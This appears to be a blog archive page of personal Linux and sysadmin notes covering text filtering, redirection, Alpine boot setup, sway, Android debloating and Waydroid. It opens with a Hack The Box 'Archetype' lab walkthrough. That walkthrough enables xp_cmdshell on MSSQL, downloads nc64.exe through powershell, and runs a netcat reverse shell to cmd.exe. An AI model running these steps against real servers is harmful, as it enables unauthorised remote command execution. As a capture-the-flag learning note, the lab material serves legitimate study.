

Showing posts from January, 2022

impacket install (for htb archetype)

sudo apt install nmap
nmap -sC -sV {TARGET_IP}
sudo apt install smbclient
smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server
smbclient -N \\\\{TARGET_IP}\\backups
apt search impacket
sudo apt install impacket-scripts python3-impacket
ARCHETYPE/[email protected]{TARGET_IP} -windows-auth
find ip addr of vpn using ip addr
SQL> EXEC xp_cmdshell 'net user';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
SQL> xp_cmdshell "whoami"
cd Downloads
sudo python3 -m http.server 80
sudo nc -lvnp 443
SQL> xp_cmdshell "powershell -c pwd"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 443"
powersh

filter text

less, more = page readers
head = reads the first 10 lines
tail = reads the last 10 lines (default)

sort
cat /etc/passwd | sort

grep
search for a pattern
cat /etc/passwd | grep "/bin/bash"
exclude a pattern with -v
cat /etc/passwd | grep -v "false\|nologin"

cut
cat /etc/passwd | grep -v "false\|nologin" | cut -d ":" -f1
-f specifies the field
-d specifies the delimiter (separator)

tr
replaces characters with others: as the first option we define the character we want to replace, and as the second option we define the character we want to replace it with
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " "

column
displays the output in column form
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | column -t

awk
first ($1) and last ($NF) result of the line
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | awk '{print $1 , $NF }'

sed
The "s&quo

file descriptors

Data Stream for Input: STDIN – 0
Data Stream for Output: STDOUT – 1
Data Stream for Output that relates to an error occurring: STDERR – 2

Redirect errors to null
find /etc/ -name shadow 2>/dev/null

Redirect STDOUT to a File
find /etc/ -name shadow 2>/dev/null > results.txt

Redirect STDOUT and STDERR to Separate Files
find /etc/ -name shadow 2> stderr.txt 1> stdout.txt

Redirect STDIN
cat < stdout.txt

Redirect STDOUT and Append to a File
find /etc/ -name passwd >> stdout.txt 2>/dev/null

Redirect STDIN Stream to a File
cat << EOF > stream.txt
EOF (End-Of-File) is the delimiter that defines where the input ends.

Pipes
Pipes pass the STDOUT of one program to another program for processing.
find /etc/ -name *.conf 2>/dev/null | grep systemd
find /etc/ -name *.conf 2>/dev/null | grep systemd | wc -l
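
An added example (not part of the original post) that exercises the redirections above and shows two pitfalls: a space between the descriptor number and `>`, and the order in which redirections are written. `emit` and `count_args` are hypothetical helpers made up for the demonstration.

```shell
#!/bin/sh
# Added example: emit and count_args are hypothetical helpers, not from the post.

# Writes one line to STDOUT (fd 1) and one to STDERR (fd 2).
emit() {
    echo "to-stdout"
    echo "to-stderr" >&2
}

# Prints how many arguments it received.
count_args() { echo "$#"; }

# Separate files for fd 1 and fd 2; prints "stdout-content|stderr-content".
split_streams() {
    dir=$(mktemp -d)
    emit 1>"$dir/stdout.txt" 2>"$dir/stderr.txt"
    printf '%s|%s\n' "$(cat "$dir/stdout.txt")" "$(cat "$dir/stderr.txt")"
    rm -rf "$dir"
}

# Pitfall: "2 >" (with a space) passes 2 as an argument and redirects STDOUT.
spaced_redirect() {
    f=$(mktemp)
    count_args a b 2 > "$f"   # three arguments; the count lands in $f
    cat "$f"
    rm -f "$f"
}

# Correct: "2>" redirects STDERR only, so the count still reaches STDOUT.
unspaced_redirect() {
    f=$(mktemp)
    count_args a b 2> "$f"    # two arguments; $f stays empty
    rm -f "$f"
}

# Order matters: redirections are applied left to right.
stderr_only() { emit 2>&1 >/dev/null; }   # STDERR to caller's STDOUT, STDOUT dropped
silence_all() { emit >/dev/null 2>&1; }   # both streams dropped

# Run each case once when the file is executed directly.
split_streams; spaced_redirect; unspaced_redirect; stderr_only; silence_all
```
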

search linux

find
find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} \; 2>/dev/null

-type f
Hereby, we define the type of the searched object. In this case, 'f' stands for 'file'.

-name *.conf
With '-name', we indicate the name of the file we are looking for. The asterisk (*) stands for 'all' files with the '.conf' extension.

-user root
This option filters all files whose owner is the root user.

-size +20k
We can then filter all the located files and specify that we only want to see the files that are larger than 20 KiB.

-newermt 2020-03-03
With this option, we set the date. Only files newer than the specified date will be presented.

-exec ls -al {} \;
This option executes the specified command, using the curly brackets as placeholders for each result. The backslash escapes the next character from being interpreted by the shell because otherwise, the semicolon would terminate the command and not reach the redi

simple webserver

npm install http-server
http-server -p 8080

python
python3 -m http.server
python -m http.server 8000

php
php -S localhost:8000
php -S

src::

control system using anaconda

conda install numpy scipy matplotlib  # if not yet installed
conda install -c conda-forge control slycot
-----------------------------------------------------
# - demonstrate some standard MATLAB commands
# RMM, 25 May 09
import os
import matplotlib.pyplot as plt  # MATLAB plotting functions
from control.matlab import *  # MATLAB-like functions

# Parameters defining the system
m = 250.0  # system mass
k = 40.0  # spring constant
b = 60.0  # damping constant

# System matrices
A = [[0, 1.], [-k/m, -b/m]]
B = [[0], [1/m]]
C = [[1., 0]]
sys = ss(A, B, C, 0)

# Step response for the system
plt.figure(1)
yout, T = step(sys)
plt.plot(T.T, yout.T)
plt.show(block=False)

# Bode plot for the system
plt.figure(2)
mag, phase, om = bode(sys, logspace(-2, 2), plot=True)
plt.show(block=False)

# Nyquist plot for the system
plt.figure(3)
nyquist(sys)
plt.show(block=False)

# Root locus plot for the sys

polar plot anaconda

conda install numpy matplotlib
apt install vscodium
-----------------------------
import numpy as np
import matplotlib.pyplot as plt

# setting the axes projection as polar
plt.axes(projection='polar')

# setting the length
# and number of petals
a = 1
n = 6

# creating an array
# containing the radian values
rads = np.arange(0, 2 * np.pi, 0.001)

# plotting the rose
for rad in rads:
    r = a * np.cos(n * rad)
    plt.polar(rad, r, 'g.')

# display the polar plot
plt.show()
---------------------------------


boot

runlevels:
1.sysinit
2.shutdown
3.nonetwork
4.default
5.boot
-------
1.sysinit (/etc/runlevels/sysinit)
ln -s /etc/init.d/udev-trigger udev-trigger
ln -s /etc/init.d/dmesg dmesg
ln -s /etc/init.d/devfs devfs
ln -s /etc/init.d/udev udev

2.shutdown (/etc/runlevels/shutdown)
/etc/init.d/savecache
/etc/init.d/killprocs
/etc/init.d/mount-ro

3. empty

4.default
/etc/init.d/udev-postmount
/etc/init.d/seatd

5.boot
/etc/init.d/wpa_supplicant
/etc/init.d/networking
/etc/init.d/hostname
/etc/init.d/bootmisc
/etc/init.d/urandom
/etc/init.d/modules
/etc/init.d/hwclock
/etc/init.d/sysctl

net alpine

cat /etc/network/interfaces
auto lo
iface lo inet loopback
auto wlan0
iface wlan0 inet static
    address
    netmask
    gateway

cat /etc/wpa_supplicant/wpa_supplicant.conf
network={
    ssid="kwifi_ssid"
    #psk="wifi_password"
}

echo "shortname" > /etc/hostname
hostname -F /etc/hostname

::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts

cat /etc/resolv.conf
nameserver
nameserver
# nameserver 2001:470:20::2

modprobe ipv6
echo "ipv6" >> /etc/modules
---------
auto eth0
iface eth0 inet dhcp

iface eth0 inet static
address
gateway
iface eth0 inet static
address

wpa_supplicant -i wl

swaybar status

DATE=$(date "+%a-%b-%d-%Y %I:%M%p")
BATSTAT=$(cat /sys/class/power_supply/BAT0/status)
BATPERC=$(cat /sys/class/power_supply/BAT0/capacity)
VSTAT="$(amixer get Master)"
VMUTE=" "
echo "$VSTAT" | grep "\[off\]" >/dev/null && VMUTE="muted"
VOLUME=$(echo "$VSTAT" | grep -o "\[[0-9]\+%\]" | sed "s/[^0-9]*//g;1q")
WIFI="$(awk '/^\s*w/ { print "", int($3 * 100 / 70) "% " }' /proc/net/wireless)"
KBLAYOUT=$(swaymsg -t get_inputs | grep -m1 'xkb_active_layout_name' | awk -F '"' '{print $4}')
BNESS="$(brightnessctl get)"
MAX="$(brightnessctl max)"
BLPERC="$((BNESS*100/MAX))"
NIGHT=
pgrep wlsunset && NIGHT=
echo $KBLAYOUT $NIGHT $BLPERC $VMUTE $VOLUME $WIFI $BATPERC% $BATSTAT $DATE

bar {
    position top
    #swaybar_command waybar
    status_command while ~/.config/swa

middle click sway

~/.config/sway/config

input type:touchpad {
    tap enabled
    dwt enabled
    middle_emulation enabled
    natural_scroll disabled
    # accel_profile "adaptive"
    #pointer_accel 1
}

middle click use:
> select text and paste it with middle click, no hassle with ctrl+c/v
> open link in new tab
> open dock/launchers/folder in new window

get weather using curl

nano
-----------------------------------------
while [ 1 ]
do
    weather=$(curl -Ss '')
    echo "$weather"
    sleep 60
done
-----------------------------------------
src

powershell
Invoke-RestMethod https://

HELP
curl

for data rich format

efistub boot using efibootmgr

sudo blkid   # to get root uuid and set label and efi partition
nano efi
--------------------------------------------------
#!/bin/sh
params="root=UUID=2e5bf9f5-4dde-4c3f-aed4-50fbbf886be2 modules=sd-mod,usb-storage,ext4 quiet loglevel=3 initrd=\initramfs-lts"
efibootmgr --create --label "Alp" \
  --disk /dev/nvme0n1 --part 1 \
  --loader /vmlinuz-lts \
  --unicode "${params}" \
  --verbose
--------------------------------------------------
#for archlinux
#!/bin/sh
params="root=UUID=a8023f6f-67a8-43db-a24d-d39ce5fdb45d quiet loglevel=3 initrd=\booster-linux.img"
efibootmgr --create --label "Arch" \
  --disk /dev/nvme0n1 --part 1 \
  --loader /vmlinuz-linux \
  --unicode "${params}" \
  --verbose
--------------------------------------------------
sudo ./efi
src:  ht

realme debloat

pm disable-user --user 0
pm enable --user 0
pm list packages -d
pm uninstall --user 0
cmd package install-existing
pm list packages
pm list packages | sort
pm list packages google
dumpsys package
pm uninstall -k --user 0    ::keeps data
pm uninstall --user 0       ::delete data
--------------------------------------------------
RMX2180:/ $ pm list packages
package:com.f1soft.esewa
package:android.frameworkres.overlay
package:com.mediatek.gba
package:com.mediatek.ims
package:com.factory.mmigroup
package:com.coloros.onekeylockscreen
package:com.coloros.phonenoareainquire
package:com.oppo.oppopowermonitor
package:com.andro

glibc alpine

apk add gcompat
doas apk add flatpak

gentoo chroot
sudo apk add xz
mkdir ~/chroot
cd ~/chroot
tar -xvf stage3-*.tar.xz
tar -xvf portage-latest.tar.xz
mv portage usr
sudo mount --bind /dev dev
sudo mount --bind /sys sys
sudo mount -t proc proc proc
cp /etc/resolv.conf etc
sudo chroot . /bin/bash

#!/bin/bash
CHROOT_PATH="/home/$USER/chroot"
cd $CHROOT_PATH
mount | grep $CHROOT_PATH/dev || sudo mount --bind /dev dev
mount | grep $CHROOT_PATH/sys || sudo mount --bind /sys sys
mount | grep $CHROOT_PATH/proc || sudo mount -t proc proc proc
cp /etc/resolv.conf etc
sudo chroot --userspec=$USER:users . /bin/bash
echo "You must manually unmount $CHROOT_PATH/dev, $CHROOT_PATH/sys, $CHROOT_PATH/proc."

chmod +x

Arch Linux
sudo apk add arch-install-scripts
mkdir ~/chroot && cd ~/chroot
curl -O

change shell alpine

apk add libuser
(1/6) Installing gdbm (1.22-r0)
(2/6) Installing mpdecimal (2.5.1-r1)
(3/6) Installing readline (8.1.1-r0)
(4/6) Installing python3 (3.9.7-r4)
(5/6) Installing popt (1.18-r0)
(6/6) Installing libuser (0.63-r0)
Executing busybox-1.34.1-r3.trigger

mkdir /etc/default
touch /etc/default/useradd
touch /etc/login.defs

If you want to change the current user's shell:
lchsh
If you want to change a different user's shell:
lchsh USERNAME

example
sudo lchsh root
Changing shell for kai.
Password:
New Shell [/bin/ash]: /bin/bash
Shell changed.

src:

alpine android adb fix

sudo apk add usbutils eudev android-tools

lsusb
Bus 001 Device 002: ID 0c45:671e Microdia Integrated_Webcam_HD
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 009: ID 22d9:2765 OPPO Electronics Corp. Oppo N1
Bus 001 Device 003: ID 0cf3:e009 Qualcomm Atheros Communications
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

udevadm info -q path -n /dev/bus/usb/001/009
/devices/pci0000:00/0000:00:14.0/usb1/1-3

udevadm info -p /devices/pci0000:00/0000:00:14.0/usb1/1-3
P: /devices/pci0000:00/0000:00:14.0/usb1/1-3
N: bus/usb/001/009
E: BUSNUM=001
E: DEVNAME=/dev/bus/usb/001/009
E: DEVNUM=009
E: DEVPATH=/devices/pci0000:00/0000:00:14.0/usb1/1-3
E: DEVTYPE=usb_device
E: DRIVER=usb
E: ID_BUS=usb
E: ID_MODEL=2765
E: ID_MODEL_ENC=2765
E: ID_MODEL_FROM_DATABASE=Oppo N1
E: ID_MODEL_ID=2765
E: ID_REVISION=0223
E: ID_SERIAL=realme_2765_FYLFUC5HCUNVKRLB
E: ID_SERIAL_SHORT=FYLFUC5HCUNVKRLB
E: ID_USB_INTERFACES=:ffff00:ff4201:
E: ID_VENDOR=realme
E: ID_VE

android (lineage os android 10 ) on debian/ubuntu using lxc

Installing Waydroid is easy
Dependencies: python3, lxc, curl, Wayland session manager !!IMPORTANT!!

sudo apt install curl
export DISTRO="focal"
(debian bullseye)
curl > /usr/share/keyrings/waydroid.gpg
echo "deb [signed-by=/usr/share/keyrings/waydroid.gpg] $DISTRO main" > /etc/apt/sources.list.d/waydroid.list
sudo apt update
sudo apt install waydroid
sudo waydroid init    (download android image)
sudo systemctl start waydroid-container
waydroid session start
waydroid show-full-ui
--------------------------------------------------
autoinstall
wget -O ~/Downloads/ && bash ~/Downloads/
--------------------------------------------------
for alpine linux (working sway/kde/gnome)

alpine linux dualboot

apk add e2fsprogs
mkfs.ext4 /dev/sdXY
mount -t ext4 /dev/sdXY /mnt
mount the boot/esp partition to /boot
setup alpine
say no to the disk, config, and cache options
setup-disk -m sys /mnt

gksudo gedit /etc/grub.d/40_custom
#!/bin/sh
echo "Adding Alpine" >&2
cat << EOF
menuentry "Alpine Linux" {
set root=(hd0,3)
linux /boot/vmlinuz-lts root=UUID=8de6973a-4a8c-40ed-b710-c4e2b42d6b7a modules=sd-mod,usb-storage,ext4 quiet
initrd /boot/initramfs-lts
}
EOF

on systemd-boot usage
copy vmlinuz-lts and initramfs-lts to / of $ESP if it is not mounted in setup
get the UUID using sudo blkid and find the alpine partition (careful with PARTUUID, it looks the same)
nano/vi /boot/loader/entries/alpine.conf
--------------------------------------------------
title alpine linix
linux /vmlinuz-lts
initrd /initramfs-lts
options root=UUID=